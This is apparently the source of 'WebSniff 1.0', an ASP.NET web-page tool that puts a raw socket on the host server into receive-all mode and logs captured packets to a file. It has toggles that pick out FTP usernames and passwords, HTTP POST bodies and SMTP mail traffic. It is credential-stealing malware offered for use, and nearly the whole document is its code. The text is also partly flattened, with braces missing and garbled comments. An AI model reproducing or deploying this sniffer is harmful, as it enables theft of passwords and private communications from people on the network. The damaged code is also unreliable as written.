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2013-09-20 17:07:46 +08:00

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<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Collections" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.Net.NetworkInformation" %>
<%@ Import Namespace="System.Threading" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>WebSniff 1.0 Powered by C.C.T¡£linx Ð޸İæ </title>
<script runat="server">
static private Socket mainSocket; //The socket which captures all incoming packets
private static byte[] byteData = new byte[2048];
private static bool bContinueCapturing = true; //A flag to check if packets are to be captured or not
static int stoppackes = 0;
static int port = 0;
static string strIP = null;
static long packets = 0;
static System.IO.FileStream wfs;
static string logfile =null;
static PacketCaptureWriter pktwt;
static string keyword;
static DateTime stoptime = System.DateTime.Now.AddYears(-8);
static Thread th;
static int minisizepacket=0;
static string proException = null;
static Boolean logNextPacket = false;
static Boolean my_s_ftp= true;
static Boolean my_s_http_post = false;
static Boolean my_s_smtp = false;
protected void Page_Load(object sender, EventArgs e)
if (logfile == null)
logfile = Server.MapPath("w" + System.DateTime.Now.ToFileTime() + ".txt");
if (stoptime.Year == (System.DateTime.Now.Year - 8))
System.DateTime nextDay = System.DateTime.Now.AddDays(1);
stoptime = nextDay;
if (ddlist.Items.Count==0)
IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));
if (HosyEntry.AddressList.Length > 0)
foreach (IPAddress ip in HosyEntry.AddressList)
if (Request.Form["Starts"] == null)
this.ddlist.SelectedValue = strIP;
this.txtport.Text = port.ToString();
this.txtMinisize.Text = minisizepacket.ToString();
this.txtkeywords.Text = keyword;
this.txtlogfile.Text = logfile;
this.txtpackets.Text = stoptime.ToString();
this.s_ftp.Checked = my_s_ftp;
this.s_http_post.Checked = my_s_http_post;
this.s_smtp.Checked = my_s_smtp;
if (th != null )
this.Lb_msg.Text = System.DateTime.Now.ToString()+" State: <b>" + th.ThreadState.ToString() +"</b> Packets: "+packets.ToString();
this.Lb_msg.Text = "Sniff Treads is not started";
if (Request.Form["Starts"] != null || th != null)
this.Starts.Enabled = false;
this.Starts.Enabled = true;
if (Request.Form["Button1"] != null)
this.Starts.Enabled = true;
this.Lb_msg.Text = System.DateTime.Now.ToString() + " State: <b>stoping. Click \"Refresh\" again to see if thread is stoped successed.</b> Packets: " + packets.ToString();
Lb_msg2.Text = proException; //´íÎóÐÅÏ¢
protected void Refresh_Click(object sender, EventArgs e)
protected void Stop_Click(object sender, EventArgs e)
packets = stoppackes;
//stoptime = System.DateTime.Now;
proException += "<br>last time stop at " + System.DateTime.Now.ToString();
bContinueCapturing = false;
if (th != null)
th = null;
catch (Exception ex)
protected void Pagestart()
strIP = ddlist.SelectedValue;
port = Int32.Parse(txtport.Text);
stoptime = Convert.ToDateTime( txtpackets.Text);
logfile = this.txtlogfile.Text;
keyword = txtkeywords.Text;
minisizepacket = Int32.Parse(txtMinisize.Text);
my_s_ftp = this.s_ftp.Checked;
my_s_http_post = this.s_http_post.Checked;
my_s_smtp = this.s_smtp.Checked;
wfs = System.IO.File.Create(logfile);
pktwt = new PacketCaptureWriter(wfs, LinkLayerType.RawIP);
bContinueCapturing = true;
packets = 0;
private static void Start()
byte[] byTrue = new byte[4] { 1, 0, 0, 0 };
byte[] byOut = new byte[4] { 1, 0, 0, 0 };
bContinueCapturing = true;
mainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
mainSocket.Bind(new IPEndPoint(IPAddress.Parse(strIP), 0));
mainSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true);
mainSocket.IOControl(IOControlCode.ReceiveAll, byTrue, byOut);
catch (Exception ex)
proException += ex.ToString()+"<BR>"; //¾²Ì¬·½·¨¿ÉÒÔ·ÃÎʾ²Ì¬±äÁ¿proException
byteData = new byte[2048];
while (System.DateTime.Now <= stoptime)
ParseData(byteData, mainSocket.Receive(byteData));
bContinueCapturing = false;
protected void Start_Click(object sender, EventArgs e)
if (this.txtlogfile.Text == "" || txtpackets.Text.Length < 1 || txtport.Text == "") return;
th = new Thread(new ThreadStart(Pagestart));
//Session["workthread"] = th;
this.Lb_msg.Text = "\r\nSniffing.Click \"Refresh\" to see the lastest status.";
public static ushort Get2Bytes(byte[] ptr, int Index, int Type)
ushort u = 0;
if (Type == 0)
u = (ushort)ptr[Index++];
u *= 256;
u += (ushort)ptr[Index++];
else if (Type == 1)
u = (ushort)ptr[++Index];
u *= 256; Index--;
u += (ushort)ptr[Index++]; Index++;
return u;
private static void ParseData(byte[] byteData, int nReceived)
byte[] nbyte = new byte[nReceived];
Array.Copy(byteData, nbyte, nReceived);
if ((int)nbyte[9] == 6)
int sport = Get2Bytes(nbyte, 20,0);
int dport = Get2Bytes(nbyte, 22,0);
String datas=Encoding.Default.GetString(nbyte);
Boolean logIt=false;
if (my_s_ftp)
if ((sport == 21 || dport == 21) &&
(datas.IndexOf("USER ") >= 0 || datas.IndexOf("PASS ") >= 0)
logIt =true;
if (!logIt && my_s_http_post)
logIt =true;
if (!logIt && datas.IndexOf("POST ")>=0)
logIt =true;
if (!logIt && my_s_smtp && (dport == 25 || sport == 25))
logIt =true;
if (!logIt && (dport == port || sport == port))
if (nReceived > minisizepacket)
if (keyword != "")
if (datas.IndexOf(keyword) >= 0)
logIt =true;
logIt =true;
PacketCapture pkt = new PacketCapture(nbyte, nReceived);
catch { }
public struct UnixTime
public static readonly DateTime MinDateTime = new DateTime(1970, 1, 1, 0, 0, 0);
public static readonly DateTime MaxDateTime = new DateTime(2038, 1, 19, 3, 14, 7);
private readonly int _Value;
public UnixTime(int value)
if (value < 0)
throw new ArgumentOutOfRangeException("value");
_Value = value;
public int Value
get { return _Value; }
public DateTime ToDateTime()
const long START = 621355968000000000; // 1970-1-1 00:00:00
return new DateTime(START + (_Value * (long)10000000)).ToLocalTime();
public static UnixTime FromDateTime(DateTime dateTime)
if (dateTime < MinDateTime || dateTime > MaxDateTime)
throw new ArgumentOutOfRangeException("dateTime");
TimeSpan span = dateTime.Subtract(MinDateTime);
return new UnixTime((int)span.TotalSeconds);
public override string ToString()
return ToDateTime().ToString();
public enum LinkLayerType : uint
Null = 0,
Ethernet = 1,
RawIP = 101,
User0 = 147,
User1 = 148,
User2 = 149,
User3 = 150,
User4 = 151,
User5 = 152,
User6 = 153,
User7 = 154,
User8 = 155,
User9 = 156,
User10 = 157,
User11 = 158,
User12 = 159,
User13 = 160,
User14 = 161,
User15 = 162,
public sealed class PacketCaptureWriter
#region Fields
private const uint MAGIC = 0xA1B2C3D4;
private readonly Stream _BaseStream;
private readonly LinkLayerType _LinkLayerType;
private readonly int _MaxPacketLength;
private readonly BinaryWriter m_Writer;
private bool m_ExistHeader = false;
private int _TimeZone;
private int _CaptureTimestamp;
#region Constructors
public PacketCaptureWriter(
Stream baseStream, LinkLayerType linkLayerType,
int maxPacketLength, int captureTimestamp)
if (baseStream == null) throw new ArgumentNullException("baseStream");
if (maxPacketLength < 0) throw new ArgumentOutOfRangeException("maxPacketLength");
if (!baseStream.CanWrite) throw new ArgumentException("Cant'Wirte Stream");
_BaseStream = baseStream;
_LinkLayerType = linkLayerType;
_MaxPacketLength = maxPacketLength;
_CaptureTimestamp = captureTimestamp;
m_Writer = new BinaryWriter(_BaseStream);
public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType, int captureTimestamp)
: this(baseStream, linkLayerType, 0xFFFF, captureTimestamp)
public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType)
: this(baseStream, linkLayerType, 0xFFFF, UnixTime.FromDateTime(DateTime.Now).Value)
#region Properties
public short VersionMajor
get { return 2; }
public short VersionMinjor
get { return 4; }
public int TimeZone
get { return _TimeZone; }
set { _TimeZone = value; }
public int CaptureTimestamp
get { return _CaptureTimestamp; }
set { _CaptureTimestamp = value; }
public Stream BaseStream
get { return _BaseStream; }
public LinkLayerType LinkLaterType
get { return _LinkLayerType; }
public int MaxPacketLength
get { return _MaxPacketLength; }
public void Write(PacketCapture packet)
m_Writer.Write(packet.Packet.Array, packet.Packet.Offset, packet.Packet.Count);
public void Flush()
private void CheckHeader()
if (!m_ExistHeader)
m_ExistHeader = true;
public sealed class PacketCapture
private readonly UnixTime _Timestamp;
private readonly ArraySegment<byte> _Packet;
private readonly int _RawLength;
private readonly int _Millseconds;
public PacketCapture(ArraySegment<byte> packet, int rawLength, UnixTime timestamp, int millseconds)
if (packet.Count > rawLength)
throw new ArgumentException("Length Error", "rawLength");
_Packet = packet;
_Timestamp = timestamp;
_RawLength = rawLength;
_Millseconds = millseconds;
public PacketCapture(ArraySegment<byte> packet, int rawLength, DateTime timestamp)
: this(packet, rawLength, UnixTime.FromDateTime(timestamp), 0)
public PacketCapture(ArraySegment<byte> packet, int rawLength)
: this(packet, rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
public PacketCapture(ArraySegment<byte> packet)
: this(packet, packet.Count)
public PacketCapture(byte[] packetData, int offset, int count, int rawLength, UnixTime timestamp, int millseconds)
: this(new ArraySegment<byte>(packetData, offset, count), rawLength, timestamp, millseconds)
public PacketCapture(byte[] packetData, int offset, int count, int rawLength, DateTime timestamp)
: this(new ArraySegment<byte>(packetData, offset, count), rawLength, UnixTime.FromDateTime(timestamp), 0)
public PacketCapture(byte[] packetData, int rawLength, UnixTime timestamp, int millseconds)
: this(new ArraySegment<byte>(packetData), rawLength, timestamp, millseconds)
public PacketCapture(byte[] packetData, int rawLength, DateTime timestamp)
: this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(timestamp), 0)
public PacketCapture(byte[] packetData, int rawLength)
: this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
public PacketCapture(byte[] packetData)
: this(packetData, packetData.Length)
public ArraySegment<byte> Packet
get { return _Packet; }
public UnixTime Timestamp
get { return _Timestamp; }
public int Millseconds
get { return _Millseconds; }
public int RawLength
get { return _RawLength; }
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<form id="form1" runat="server">
<div id="tt"> <b> WebSniff 1.0</b><br /><br /> </div>
<div id="Ct_2" >
<table width="100%" >
<tr >
<td width="10%"> BindIP: </td>
<td ><asp:DropDownList ID="ddlist" runat="server" width="90%"></asp:DropDownList></td>
<tr >
<td width="10%">Auto sniff: </td>
<td >
FTP Password:
<asp:CheckBox ID="s_ftp" runat="server" Checked />
HTTP Post Data:
<asp:CheckBox ID="s_http_post" runat="server" />
Smtp Data:
<asp:CheckBox ID="s_smtp" runat="server" />
<td ">
<asp:TextBox ID="txtport" Text="0" width="90%" runat="server"></asp:TextBox>
<td >
<td >
<asp:TextBox ID="txtMinisize" Text="0" width="90%" runat="server" ></asp:TextBox>
<asp:TextBox ID="txtkeywords" runat="server" width="90%" Text=""></asp:TextBox>
<td >
<asp:TextBox ID="txtlogfile" runat="server" width="90%" Text="log.log" ></asp:TextBox>
<td >
Stop At Time:
<asp:TextBox ID="txtpackets" runat="server" width="90%" Text="300"></asp:TextBox>
<td >
<td width="90%" > <asp:Button ID="Starts" runat="server" OnClick="Start_Click" Text="Start" />
<asp:Button ID="Button1" runat="server" OnClick="Stop_Click" Text="Stop" />
<asp:Button ID="Button_ref" runat="server" OnClick="Refresh_Click" Text="Refresh/View Status" /><br />
<td >
<td width="90%"><div id="s"><asp:Label ID="Lb_msg" runat="server" Text=""></div></asp:Label>
<td >
<td width="90%"><div id="s"><asp:Label ID="Lb_msg2" runat="server" Text=""></div></asp:Label>
</div><br /><br />
<div id=b>Powered by <a href="//www.cncert.net"> C.C.T </a>|Version 1.0
<a href=" http://hi.baidu.com/cnqing/blog/item/92d8b35008ad871f377abee4.html">1</a>
<a href="http://hi.baidu.com/linx2008/blog/item/7020f1de1b1c805395ee3768.html">2</a>